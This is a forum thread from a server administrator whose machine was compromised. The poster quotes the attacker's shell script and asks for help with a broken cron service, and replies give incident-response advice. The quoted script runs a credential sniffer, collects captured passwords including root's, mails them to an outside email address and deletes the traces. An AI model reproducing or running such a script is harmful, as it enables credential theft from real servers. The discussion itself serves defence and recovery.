SSH Hack - IptabLes & IptabLex
My server was recently attached with a bot here is a file left behind.
#!/bin/sh cd /usr/lib/ ./popauth -r httpd.log > test #This part, the output to test, they were able to uncover all users passwords including "roots" mkdir /usr/share/misc/ mkdir /usr/share/misc/blah/ cat /usr/share/misc/blah/temp.log |uniq >> test echo >/usr/share/misc/blah/temp.log mail deathface2007@yahoo.com -s "$(hostname -f)" < test #Left his email address behind rm -rf test httpd.log A=$PATH killall -9 popauth export PATH=/usr/lib/ popauth -w httpd.log & export PATH=$A I was able to lock down ssh in /etc/ssh/sshd_config, and remove and kill of the processes and files from the hacker But cron is not working now: # service crond restart Stopping crond: 0G[;31mFAILED;39m] Starting crond: execvp: No such file or directory 0G[;31mFAILED;39m] I tired re-loading rpm's but it still will not run. The hacker seems to have done something to kill cron. Any Idea's of what i can do? Also, is there a way to remove cron all together so I can reload it altogether? |
Quote:
Do you know what to do or would you like to know more? |
Quote:
My customer, runs his entire business on this server, so I am unable to just "Cut my losses and do a clean install" ---------- Post added 06-09-14 at 08:01 AM ---------- Quote:
|
Quote:
So. Let me phrase this differently then: - Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise. - You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data). - If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it. So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords of private keys. Harden it properly. Adhere to best practices. Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion. |
Quote:
Thanks for trying to help, but I found another online form that is helping to solving my problem. |
I doubt it.
|
Quote:
For anyone else: should you want to check then, due to http://rkhunter.cvs.sourceforge.net/....507&r2=1.508& and http://rkhunter.cvs.sourceforge.net/....1&view=markup, you best get Rootkit Hunter from CVS until released officially. |
All times are GMT -5. The time now is 10:31 AM. |